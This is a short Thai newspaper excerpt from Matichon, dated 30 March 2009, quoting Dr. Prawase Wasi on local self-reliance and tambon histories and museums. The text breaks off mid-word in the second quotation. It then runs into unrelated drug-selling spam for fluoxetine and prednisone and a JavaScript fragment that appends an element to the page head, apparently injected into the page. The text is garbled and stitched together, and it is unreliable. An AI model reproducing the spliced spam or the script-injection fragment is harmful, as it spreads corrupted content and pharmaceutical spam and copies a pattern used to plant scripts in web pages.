หนังสือพิมพ์มติชน ฉบับประจำวันจันทร์ที่ 30 มีนาคม 2552

“ถ้าเรามีสัมมาทิฐิเกี่ยวกับการพัฒนา ประเทศไทยมีทรัพยากรเหลือเฟือที่จะสร้างสุขภาวะแก่คนไทยทั้งมวล” หมอประเวศ วะสี บอกไว้ในข้อเขียนเรื่องท้องถิ่นเข้มแข็ง ประวัติศาสตร์ตำบล พิพิธภัณฑ์ตำบล (ในมติชน ฉบับวันเสาร์ที่ 21 มีนาคม 2552 หน้า 9) จะขอยกสาระสำคัญมาเผยแพร่ซ้ำด้วยความเคารพอย่างสูงยิ่ง

“แต่ที่ทุกข์เข็ญกันไปทุกหย่อมหญfluoxetine common side effects buy prednisone 10mgd.getElementsByTagName(‘head’)[0].appendChild(s);